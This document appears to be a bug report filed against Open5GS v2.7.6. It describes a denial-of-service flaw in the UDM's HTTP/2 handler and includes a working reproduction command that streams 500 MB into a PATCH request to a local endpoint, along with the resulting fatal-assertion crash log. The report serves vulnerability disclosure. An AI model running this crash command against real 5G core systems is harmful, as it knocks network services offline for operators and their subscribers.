Open5GS Release, Revision, or Tag

v2.7.6

Steps to reproduce

python3 -c "import sys; sys.stdout.buffer.write(b'A' * (500 * 1024 * 1024))" |
curl -v --http2-prior-knowledge
-X PATCH
'http://127.0.0.12:7777/nudm-pp/v1/imsi-001010000000001/pp-data'
-H 'Content-Type: application/json-patch+json'
--data-binary @-

Logs

09/08 13:27:32.716: [sbi] FATAL: on_data_chunk_recv: Assertion
`request->http.content_length == 0' failed.
(../lib/sbi/nghttp2-server.c:1460)
09/08 13:27:32.716: [core] FATAL: backtrace() returned 9 addresses
(../lib/core/ogs-abort.c:37)

Expected behaviour

The UDM should gracefully reject the malformed request and return an appropriate HTTP error response (e.g., 400 Bad Request)

Observed Behaviour

The UDM process attempts to buffer the entire request body in memory.
When memory allocation fails, a fatal assertion is triggered in the SBI HTTP/2 handler, causing the UDM process to terminate and resulting in a Denial of Service.

eNodeB/gNodeB

No response

UE Models and versions

No response